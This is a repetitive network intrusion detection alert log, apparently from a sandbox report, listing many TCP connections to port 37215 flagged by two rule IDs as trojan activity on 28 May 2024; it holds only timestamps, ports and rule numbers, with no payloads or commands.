          Timestamp:05/28/24-14:47:21.187279
          SID:2835222
          Source Port:34728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.157898
          SID:2835222
          Source Port:54858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605890
          SID:2829579
          Source Port:42178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273320
          SID:2829579
          Source Port:48934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.965365
          SID:2829579
          Source Port:35124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605209
          SID:2829579
          Source Port:60206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357195
          SID:2829579
          Source Port:33102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755698
          SID:2829579
          Source Port:39584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.752114
          SID:2829579
          Source Port:55574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.436299
          SID:2829579
          Source Port:57580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.178979
          SID:2835222
          Source Port:56252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953234
          SID:2829579
          Source Port:35604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922567
          SID:2829579
          Source Port:49942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923237
          SID:2829579
          Source Port:50070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341243
          SID:2835222
          Source Port:39726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964990
          SID:2829579
          Source Port:39416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299506
          SID:2835222
          Source Port:49554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271021
          SID:2835222
          Source Port:48426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463450
          SID:2835222
          Source Port:45072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143081
          SID:2829579
          Source Port:47904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.185987
          SID:2829579
          Source Port:51178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795143
          SID:2829579
          Source Port:34816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797657
          SID:2829579
          Source Port:53446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.131763
          SID:2835222
          Source Port:40746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663808
          SID:2835222
          Source Port:55984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177127
          SID:2835222
          Source Port:41156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.560183
          SID:2829579
          Source Port:48548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272760
          SID:2829579
          Source Port:57340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300342
          SID:2829579
          Source Port:41424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.717998
          SID:2829579
          Source Port:44304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.891213
          SID:2829579
          Source Port:38296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114493
          SID:2835222
          Source Port:36604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206388
          SID:2835222
          Source Port:46262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.525494
          SID:2829579
          Source Port:34806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046064
          SID:2835222
          Source Port:55874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336534
          SID:2829579
          Source Port:38096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405413
          SID:2835222
          Source Port:50000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922557
          SID:2829579
          Source Port:47136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.772331
          SID:2829579
          Source Port:48306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324227
          SID:2829579
          Source Port:60922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204811
          SID:2829579
          Source Port:36508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.367097
          SID:2829579
          Source Port:47762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.613206
          SID:2829579
          Source Port:54660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112909
          SID:2835222
          Source Port:39688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.553073
          SID:2829579
          Source Port:49270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201717
          SID:2835222
          Source Port:58280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.165687
          SID:2835222
          Source Port:52096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328576
          SID:2835222
          Source Port:52828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208274
          SID:2835222
          Source Port:41432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206404
          SID:2829579
          Source Port:44610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.304134
          SID:2835222
          Source Port:60602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975019
          SID:2835222
          Source Port:58894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.911271
          SID:2835222
          Source Port:39174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156398
          SID:2835222
          Source Port:56854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949435
          SID:2835222
          Source Port:53004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472337
          SID:2829579
          Source Port:45924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.812443
          SID:2829579
          Source Port:36032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760407
          SID:2835222
          Source Port:44150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529216
          SID:2829579
          Source Port:52682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.488364
          SID:2835222
          Source Port:42890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845466
          SID:2835222
          Source Port:54166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743535
          SID:2835222
          Source Port:52080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.870923
          SID:2835222
          Source Port:53504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535137
          SID:2829579
          Source Port:47792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739682
          SID:2829579
          Source Port:50730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115764
          SID:2829579
          Source Port:42100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223510
          SID:2835222
          Source Port:58256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.780330
          SID:2829579
          Source Port:53800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472712
          SID:2829579
          Source Port:46652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.437090
          SID:2829579
          Source Port:44332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.351099
          SID:2835222
          Source Port:56956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550705
          SID:2835222
          Source Port:37390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141811
          SID:2829579
          Source Port:35672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.525779
          SID:2835222
          Source Port:54488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213590
          SID:2829579
          Source Port:60410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.225788
          SID:2835222
          Source Port:45882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.870764
          SID:2829579
          Source Port:36048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.019404
          SID:2835222
          Source Port:47258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462984
          SID:2835222
          Source Port:54490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543369
          SID:2829579
          Source Port:32974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196933
          SID:2829579
          Source Port:35928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809936
          SID:2829579
          Source Port:33294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.617118
          SID:2835222
          Source Port:57450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116771
          SID:2835222
          Source Port:50006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332652
          SID:2829579
          Source Port:58812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472318
          SID:2829579
          Source Port:47878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818620
          SID:2829579
          Source Port:44114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.617074
          SID:2829579
          Source Port:45142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402566
          SID:2835222
          Source Port:43296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.094238
          SID:2829579
          Source Port:48254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.473685
          SID:2835222
          Source Port:51292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.933182
          SID:2829579
          Source Port:46164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474379
          SID:2829579
          Source Port:55736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210188
          SID:2835222
          Source Port:35794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530320
          SID:2829579
          Source Port:52316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.270289
          SID:2829579
          Source Port:56726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.173616
          SID:2829579
          Source Port:34214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727978
          SID:2835222
          Source Port:40094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299691
          SID:2829579
          Source Port:39520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.336949
          SID:2829579
          Source Port:39168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.985560
          SID:2835222
          Source Port:56490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959777
          SID:2829579
          Source Port:59712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.284279
          SID:2829579
          Source Port:59506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474187
          SID:2829579
          Source Port:57810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462956
          SID:2835222
          Source Port:45752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652992
          SID:2829579
          Source Port:48652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.932746
          SID:2835222
          Source Port:60030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890720
          SID:2835222
          Source Port:55458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.945470
          SID:2835222
          Source Port:39990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652245
          SID:2829579
          Source Port:55738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.813682
          SID:2829579
          Source Port:60626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744370
          SID:2829579
          Source Port:46242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.181811
          SID:2835222
          Source Port:54454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293871
          SID:2829579
          Source Port:36958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.602488
          SID:2829579
          Source Port:34554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178059
          SID:2829579
          Source Port:40628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745933
          SID:2829579
          Source Port:38504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938386
          SID:2835222
          Source Port:41104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178453
          SID:2835222
          Source Port:42090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839608
          SID:2835222
          Source Port:43444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268085
          SID:2829579
          Source Port:45626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.889876
          SID:2829579
          Source Port:54998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.498155
          SID:2829579
          Source Port:43374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270547
          SID:2829579
          Source Port:41850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.768550
          SID:2829579
          Source Port:56580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.874724
          SID:2835222
          Source Port:36882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735781
          SID:2829579
          Source Port:59088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841240
          SID:2835222
          Source Port:39802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.318898
          SID:2829579
          Source Port:38870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.736825
          SID:2835222
          Source Port:34134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465321
          SID:2829579
          Source Port:57864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593259
          SID:2835222
          Source Port:49400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341343
          SID:2835222
          Source Port:39600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.173678
          SID:2829579
          Source Port:48076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223146
          SID:2829579
          Source Port:49908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.800702
          SID:2829579
          Source Port:53302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536697
          SID:2835222
          Source Port:54428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273226
          SID:2829579
          Source Port:44478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891022
          SID:2835222
          Source Port:43750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.173514
          SID:2829579
          Source Port:40124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328905
          SID:2829579
          Source Port:49140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959901
          SID:2835222
          Source Port:40846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.875979
          SID:2835222
          Source Port:32952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401632
          SID:2835222
          Source Port:42176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.242025
          SID:2829579
          Source Port:53886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.187324
          SID:2835222
          Source Port:34960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.507827
          SID:2835222
          Source Port:45494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299124
          SID:2835222
          Source Port:37728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536663
          SID:2835222
          Source Port:43556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.487380
          SID:2835222
          Source Port:47602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497022
          SID:2835222
          Source Port:33590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.073287
          SID:2829579
          Source Port:41656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327933
          SID:2835222
          Source Port:51690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590916
          SID:2835222
          Source Port:60244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.627438
          SID:2835222
          Source Port:46842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.730310
          SID:2835222
          Source Port:39976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.279007
          SID:2829579
          Source Port:54718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590525
          SID:2829579
          Source Port:39766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.664650
          SID:2829579
          Source Port:39428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115804
          SID:2829579
          Source Port:54666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728470
          SID:2829579
          Source Port:40116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.591053
          SID:2835222
          Source Port:60506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.977089
          SID:2835222
          Source Port:56756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125858
          SID:2829579
          Source Port:49938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401586
          SID:2835222
          Source Port:52462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.299255
          SID:2829579
          Source Port:41334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300251
          SID:2835222
          Source Port:33226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402433
          SID:2829579
          Source Port:39892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196631
          SID:2829579
          Source Port:50694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.243236
          SID:2835222
          Source Port:59968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190388
          SID:2829579
          Source Port:49110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046074
          SID:2829579
          Source Port:35722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542254
          SID:2829579
          Source Port:50476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923339
          SID:2829579
          Source Port:60310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650282
          SID:2829579
          Source Port:44458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337599
          SID:2829579
          Source Port:59548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.589048
          SID:2835222
          Source Port:49834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.812865
          SID:2835222
          Source Port:40852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.159294
          SID:2835222
          Source Port:46096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652858
          SID:2829579
          Source Port:42696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.162292
          SID:2829579
          Source Port:59676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064385
          SID:2835222
          Source Port:57018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211801
          SID:2835222
          Source Port:47642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.810441
          SID:2835222
          Source Port:60820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.860550
          SID:2829579
          Source Port:36560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272264
          SID:2835222
          Source Port:45228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267009
          SID:2835222
          Source Port:55114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229487
          SID:2829579
          Source Port:60370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847495
          SID:2829579
          Source Port:57980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.501251
          SID:2835222
          Source Port:46018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033299
          SID:2829579
          Source Port:36000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.886390
          SID:2829579
          Source Port:51074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809291
          SID:2835222
          Source Port:33438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175782
          SID:2829579
          Source Port:44064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.874208
          SID:2835222
          Source Port:46508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922535
          SID:2835222
          Source Port:49660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989040
          SID:2829579
          Source Port:59462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.186027
